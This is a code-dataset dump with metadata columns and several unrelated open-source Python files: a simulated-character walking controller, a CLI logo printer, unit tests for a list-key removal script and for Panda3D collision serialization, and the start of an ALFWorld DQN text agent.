| 0
| 0.206452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
c52a3c803e228cb6d1b29b676b706c92848fc034
| 14,538
|
py
|
Python
|
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
from App.Proxys import *
data = IKVMCController(
name = '',
controlParamsList = [
ControlParams( joint = 'root', kp = 1000.0, kd = 200.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'pelvis_lowerback', kp = 75.0, kd = 17.0, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lowerback_torso', kp = 75.0, kd = 17.0, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'torso_head', kp = 10.0, kd = 3.0, tauMax = 200.0, scale = ( 1.0, 0.2, 1.0 ) ),
ControlParams( joint = 'lShoulder', kp = 15.0, kd = 5.0, tauMax = 200.0, scale = ( 0.5, 1.0, 1.0 ) ),
ControlParams( joint = 'rShoulder', kp = 15.0, kd = 5.0, tauMax = 200.0, scale = ( 0.3, 1.0, 1.0 ) ),
ControlParams( joint = 'lElbow', kp = 5.0, kd = 1.0, tauMax = 200.0, scale = ( 0.2, 1.0, 1.0 ) ),
ControlParams( joint = 'rElbow', kp = 5.0, kd = 1.0, tauMax = 200.0, scale = ( 0.2, 1.0, 1.0 ) ),
ControlParams( joint = 'lHip', kp = 300.0, kd = 35.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rHip', kp = 300.0, kd = 35.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lKnee', kp = 300.0, kd = 35.0, tauMax = 1000.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rKnee', kp = 300.0, kd = 35.0, tauMax = 1000.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lAnkle', kp = 50.0, kd = 15.0, tauMax = 100.0, scale = ( 1.0, 0.2, 0.2 ) ),
ControlParams( joint = 'rAnkle', kp = 50.0, kd = 15.0, tauMax = 100.0, scale = ( 1.0, 0.2, 0.2 ) ),
ControlParams( joint = 'lToeJoint', kp = 2.0, kd = 0.2, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rToeJoint', kp = 2.0, kd = 0.2, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ) ],
states = [
SimBiConState(
name = 'State 0',
nextStateIndex = 0,
duration = 0.6,
externalForces = [ ],
trajectories = [
Trajectory(
joint = 'root',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory( joint = 'SWING_Hip', strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ], components = [ ] ),
Trajectory(
joint = 'SWING_Knee',
strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Knee',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.003344, 0.204846 ), ( 0.959866, 0.070153 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Ankle',
strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.3 ), ( 0.3, 0.3 ), ( 0.4, 0.0 ), ( 1.0, -0.3 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [
( -0.5, 2.0 ),
( -0.1, 1.0 ),
( 0.0, 0.0 ),
( 0.1, 1.0 ),
( 0.5, 2.5 ),
( 1.0, 6.0 ),
( 1.1, 7.0 ),
( 1.5, 3.0 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Ankle',
strength = [ ( 0.3, 1.0 ) ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, -0.1 ), ( 0.3, 0.0 ), ( 0.8, 0.0 ), ( 1.0, 0.2 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.1, 0.5 ), ( 0.0, 0.0 ), ( 0.2, 0.2 ), ( 0.5, 0.2 ), ( 1.0, 2.5 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Shoulder',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.2 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, -1.57 ), ( 0.752508, -1.473995 ), ( 0.979933, -1.308908 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
feedback = LinearBalanceFeedback( axis = ( 0.0, 0.0, 1.0 ), cv = 0.1, vLimits = ( -0.6, 0.6 ) ),
baseTrajectory = [ ( 0.0, 0.143195 ), ( 0.558653, 0.193845 ), ( 0.813333, 0.16319 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Shoulder',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 1.57 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
feedback = LinearBalanceFeedback( axis = ( 0.0, 0.0, 1.0 ), cv = -0.1, vLimits = ( -0.6, 0.6 ) ),
baseTrajectory = [ ( 0.0, -0.2 ), ( 0.842809, -0.176382 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Elbow',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 0.1 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Elbow',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.006689, -0.1 ), ( 0.568562, -0.2 ), ( 0.989967, -0.1 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'pelvis_lowerback',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.5, 0.0 ), ( 0.8, 0.15 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.0 ), ( 0.8, 1.0 ) ] ) ] ),
Trajectory(
joint = 'lowerback_torso',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.508361, -0.2 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.1 ), ( 0.5, 0.5 ), ( 1.0, 1.0 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.3, 0.0 ), ( 0.75, 0.2 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.0 ), ( 0.8, 1.0 ) ] ) ] ),
Trajectory(
joint = 'torso_head',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_ToeJoint',
strength = [ ( 0.3, 0.1 ), ( 0.5, 0.1 ), ( 0.6, 1.0 ) ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_ToeJoint',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] )
]
)
]
)
| 51.736655
| 125
| 0.347641
| 1,131
| 14,538
| 4.44916
| 0.091954
| 0.084261
| 0.077504
| 0.051669
| 0.870827
| 0.82035
| 0.786963
| 0.781598
| 0.781598
| 0.771264
| 0
| 0.127804
| 0.524763
| 14,538
| 281
| 126
| 51.736655
| 0.600521
| 0
| 0
| 0.707031
| 0
| 0
| 0.03157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003906
| 0
| 0.003906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c53e3a14cc972235ec4de18b8690e2b3b1f1100b
| 491
|
py
|
Python
|
redlist/logo.py
|
Ramenseller/RedList
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 2
|
2018-05-03T04:47:56.000Z
|
2018-05-17T03:54:48.000Z
|
redlist/logo.py
|
Ramenseller/B4_OS18
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 37
|
2018-05-16T14:18:46.000Z
|
2018-05-29T15:01:33.000Z
|
redlist/logo.py
|
Ramenseller/RedList
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 5
|
2018-05-03T04:35:05.000Z
|
2018-05-14T11:47:42.000Z
|
# -*- coding: utf-8 -*-
from colorama import Fore
def print_logo():
"""
___ __ __ _ __
/ _ \___ ___/ / / / (_)__ / /_
/ , _/ -_) _ / / /__/ (_-</ __/
/_/|_|\__/\_,_/ /____/_/___/\__/
by Team Avengers
MIT LICENSE
VERSION
"""
print(Fore.RED + " ___ __ __ _ __ \n / _ \___ ___/ / / / (_)__ / /_\n / , _/ -_) _ / / /__/ (_-</ __/\n/_/|_|\__/\_,_/ /____/_/___/\__/ \n")
print("by Team Avengers\nMIT LICENSE\nVERSION 0.0.8\n\n" + Fore.RESET)
| 30.6875
| 161
| 0.476578
| 37
| 491
| 3.864865
| 0.594595
| 0.055944
| 0.195804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011364
| 0.283096
| 491
| 16
| 162
| 30.6875
| 0.394886
| 0.386965
| 0
| 0
| 0
| 0.25
| 0.664311
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0.75
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c5477f45e6dfa2badd5339c1d180bcbf0140f2f9
| 5,102
|
py
|
Python
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from RemoveKeyFromList import remove_key_from_list_command
import demistomock as demisto # noqa # pylint: disable=unused-wildcard-import
from typing import List, Dict, Any
import json
MOCK_LIST_NAME = "TestList"
MOCK_KEY_NAME = "TestKey"
def test_remove_nonexisting_key_in_nonempty_list(mocker):
"""
Given:
- a nonempty list with some value
- a key that doesn't exist in the list
When
- trying to remove a key that doesn't exist in the list
Then
- a message saying the key was not found is returned
"""
MOCKED_START_LIST: Dict = {
"AnotherKey": "SomeValue"
}
def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
if name == 'getList':
return [{"Contents": json.dumps(MOCKED_START_LIST)}]
elif name == 'setList':
return [{"Contents": f"Done: list {name} was updated"}]
raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")
mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
result = remove_key_from_list_command({
'listName': MOCK_LIST_NAME,
'keyName': MOCK_KEY_NAME,
})
assert result.readable_output == f'Key {MOCK_KEY_NAME} not found in list {MOCK_LIST_NAME}, cannot remove.'
assert len(mocked_ec.call_args_list) == 1
def test_remove_nonexisting_key_in_empty_list(mocker):
"""
Given:
- an empty list
- a key that doesn't exist in the list
When
- trying to remove a key
Then
- a message saying the key was not found is returned
"""
MOCKED_START_LIST: Dict = {}
def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
if name == 'getList':
return [{"Contents": json.dumps(MOCKED_START_LIST)}]
elif name == 'setList':
return [{"Contents": f"Done: list {name} was updated"}]
raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")
mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
result = remove_key_from_list_command({
'listName': MOCK_LIST_NAME,
'keyName': MOCK_KEY_NAME,
})
assert result.readable_output == f'Key {MOCK_KEY_NAME} not found in list {MOCK_LIST_NAME}, cannot remove.'
assert len(mocked_ec.call_args_list) == 1
def test_remove_existing_key(mocker):
"""
Given:
- a nonempty list with 2 values
- a key that exists in the list
When
- trying to remove a key exists exist in the list
Then
- requested key is removed from list
- list is left with only one item
"""
MOCKED_START_LIST: Dict = {
MOCK_KEY_NAME: "Value",
"AnotherKey": "AnotherValue"
}
MOCKED_END_LIST: Dict = {
"AnotherKey": "AnotherValue"
}
def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
if name == 'getList':
return [{"Contents": json.dumps(MOCKED_START_LIST)}]
elif name == 'setList':
return [{"Contents": f"Done: list {name} was updated"}]
raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")
mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
result = remove_key_from_list_command({
'listName': MOCK_LIST_NAME,
'keyName': MOCK_KEY_NAME,
})
assert result.readable_output == f'Successfully removed key {MOCK_KEY_NAME} from list {MOCK_LIST_NAME}.'
assert len(mocked_ec.call_args_list) == 2
assert mocked_ec.call_args_list[1][0][0] == 'setList'
assert json.loads(mocked_ec.call_args_list[1][0][1]['listData']) == MOCKED_END_LIST
def test_remove_existing_last_key(mocker):
"""
Given:
- a nonempty list with 1 value
- a key that exists in the list (the only one that exists)
When
- trying to remove the last key of the list
Then
- requested key is removed from list
- list is empty
"""
MOCKED_START_LIST: Dict = {
MOCK_KEY_NAME: "Value"
}
MOCKED_END_LIST: Dict = {}
def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
if name == 'getList':
return [{"Contents": json.dumps(MOCKED_START_LIST)}]
elif name == 'setList':
return [{"Contents": f"Done: list {name} was updated"}]
raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")
mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
result = remove_key_from_list_command({
'listName': MOCK_LIST_NAME,
'keyName': MOCK_KEY_NAME,
})
assert result.readable_output == f'Successfully removed key {MOCK_KEY_NAME} from list {MOCK_LIST_NAME}.'
assert len(mocked_ec.call_args_list) == 2
assert mocked_ec.call_args_list[1][0][0] == 'setList'
assert json.loads(mocked_ec.call_args_list[1][0][1]['listData']) == MOCKED_END_LIST
| 34.241611
| 110
| 0.649353
| 681
| 5,102
| 4.660793
| 0.161527
| 0.032766
| 0.038122
| 0.040328
| 0.863894
| 0.854127
| 0.831128
| 0.799937
| 0.777883
| 0.760555
| 0
| 0.004634
| 0.23873
| 5,102
| 148
| 111
| 34.472973
| 0.812564
| 0.170913
| 0
| 0.753086
| 0
| 0
| 0.246555
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.098765
| false
| 0
| 0.049383
| 0
| 0.246914
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d97754d8779ba8c30df67581f86cfacfb093add
| 2,713
|
py
|
Python
|
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
from panda3d import core
def test_collision_tube_alias():
assert hasattr(core, 'CollisionCapsule')
assert hasattr(core, 'CollisionTube')
assert core.CollisionTube is core.CollisionCapsule
def test_collision_tube_write_old():
buffer = core.DatagramBuffer()
writer = core.BamWriter(buffer)
assert writer.get_file_major_ver() == 6
writer.set_file_minor_ver(43)
capsule = core.CollisionCapsule((0, 0, -1), (0, 0, 1), 0.5)
writer.init()
writer.write_object(capsule)
writer.flush()
data = buffer.data
assert b'CollisionTube' in data
assert b'CollisionCapsule' not in data
def test_collision_tube_write_new():
buffer = core.DatagramBuffer()
writer = core.BamWriter(buffer)
assert writer.get_file_major_ver() == 6
writer.set_file_minor_ver(44)
capsule = core.CollisionCapsule((0, 0, -1), (0, 0, 1), 0.5)
writer.init()
writer.write_object(capsule)
writer.flush()
data = buffer.data
assert b'CollisionTube' not in data
assert b'CollisionCapsule' in data
def test_collision_tube_read_old():
# Make sure we can read an older file that contains CollisionTube.
buffer = core.DatagramBuffer(b'\x06\x00\x00\x00\x06\x00+\x00\x01\x00\xd6\x00\x00\x00\x00j\x01\r\x00CollisionTube\x01h\x01\x0e\x00CollisionSolid\x01B\x00\x11\x00CopyOnWriteObject\x01A\x00!\x00CachedTypedWritableReferenceCount\x01=\x00\x1b\x00TypedWritableReferenceCount\x02<\x00\r\x00TypedWritable\x01\x03\x00\x0b\x00TypedObject\x00\x07\x00\x0e\x00ReferenceCount\x00\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00?\x01\x00\x00\x00\x01')
reader = core.BamReader(buffer)
reader.init()
assert reader.file_version == (6, 43)
capsule = reader.read_object()
reader.resolve()
assert isinstance(capsule, core.CollisionCapsule)
def test_collision_tube_read_new():
# Make sure we can read a newer file that contains CollisionCapsule.
buffer = core.DatagramBuffer(b'\x06\x00\x00\x00\x06\x00,\x00\x01\x00\xd9\x00\x00\x00\x00j\x01\x10\x00CollisionCapsule\x01h\x01\x0e\x00CollisionSolid\x01B\x00\x11\x00CopyOnWriteObject\x01A\x00!\x00CachedTypedWritableReferenceCount\x01=\x00\x1b\x00TypedWritableReferenceCount\x02<\x00\r\x00TypedWritable\x01\x03\x00\x0b\x00TypedObject\x00\x07\x00\x0e\x00ReferenceCount\x00\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00?\x01\x00\x00\x00\x01')
reader = core.BamReader(buffer)
reader.init()
assert reader.file_version == (6, 44)
capsule = reader.read_object()
reader.resolve()
assert isinstance(capsule, core.CollisionCapsule)
| 42.390625
| 514
| 0.743826
| 391
| 2,713
| 5.066496
| 0.222506
| 0.163554
| 0.181726
| 0.169611
| 0.859162
| 0.787481
| 0.730944
| 0.730944
| 0.730944
| 0.730944
| 0
| 0.140093
| 0.123848
| 2,713
| 63
| 515
| 43.063492
| 0.693311
| 0.048286
| 0
| 0.577778
| 0
| 0.044444
| 0.401706
| 0.367972
| 0
| 0
| 0
| 0
| 0.288889
| 1
| 0.111111
| false
| 0
| 0.022222
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3df65b8c8e6ce73839bc2aea7f1cb7702a7198e0
| 57,417
|
py
|
Python
|
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
import copy
import operator
import logging
from queue import PriorityQueue
import numpy as np
import torch
import torch.nn.functional as F
logging.getLogger("transformers.tokenization_utils").setLevel(logging.ERROR)
from alfworld.agents.agent import BaseAgent
from alfworld.agents.modules.generic import to_np, to_pt, _words_to_ids, pad_sequences, preproc, max_len, ez_gather_dim_1, LinearSchedule, BeamSearchNode
from alfworld.agents.modules.layers import NegativeLogLoss, masked_mean, compute_mask, GetGenerationQValue
class TextDQNAgent(BaseAgent):
'''
TextAgent trained with DQN (Reinforcement Learning)
'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
assert self.training_method == "dqn"
def choose_random_action(self, action_rank, action_unpadded=None):
"""
Select an action randomly.
"""
batch_size = action_rank.size(0)
action_space_size = action_rank.size(1)
if action_unpadded is None:
indices = np.random.choice(action_space_size, batch_size)
else:
indices = []
for j in range(batch_size):
indices.append(np.random.choice(len(action_unpadded[j])))
indices = np.array(indices)
return indices
def choose_maxQ_action(self, action_rank, action_mask=None):
"""
Generate an action by maximum q values.
"""
action_rank = action_rank - torch.min(action_rank, -1, keepdim=True)[0] + 1e-2 # minus the min value, so that all values are non-negative
if action_mask is not None:
assert action_mask.size() == action_rank.size(), (action_mask.size().shape, action_rank.size())
action_rank = action_rank * action_mask
action_indices = torch.argmax(action_rank, -1) # batch
return to_np(action_indices)
# choosing from list of admissible commands
def admissible_commands_act_greedy(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics):
with torch.no_grad():
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
action_scores, action_masks, current_dynamics = self.action_scoring(action_candidate_list,
h_obs, obs_mask,
h_td, td_mask,
previous_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
chosen_indices = action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics
def admissible_commands_act_random(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics):
with torch.no_grad():
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
action_scores, action_masks, current_dynamics = self.action_scoring(action_candidate_list,
h_obs, obs_mask,
h_td, td_mask,
previous_dynamics,
use_model="online")
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
chosen_indices = action_indices_random
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics
def admissible_commands_act(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics, random=False):
with torch.no_grad():
if self.mode == "eval":
return self.admissible_commands_act_greedy(observation_strings, task_desc_strings, action_candidate_list, previous_dynamics)
if random:
return self.admissible_commands_act_random(observation_strings, task_desc_strings, action_candidate_list, previous_dynamics)
batch_size = len(observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
h_td, td_mask = self.encode(task_desc_strings, use_model="online")
action_scores, action_masks, current_dynamics = self.action_scoring(action_candidate_list,
h_obs, obs_mask,
h_td, td_mask,
previous_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
# random number for epsilon greedy
rand_num = np.random.uniform(low=0.0, high=1.0, size=(batch_size,))
less_than_epsilon = (rand_num < self.epsilon).astype("float32") # batch
greater_than_epsilon = 1.0 - less_than_epsilon
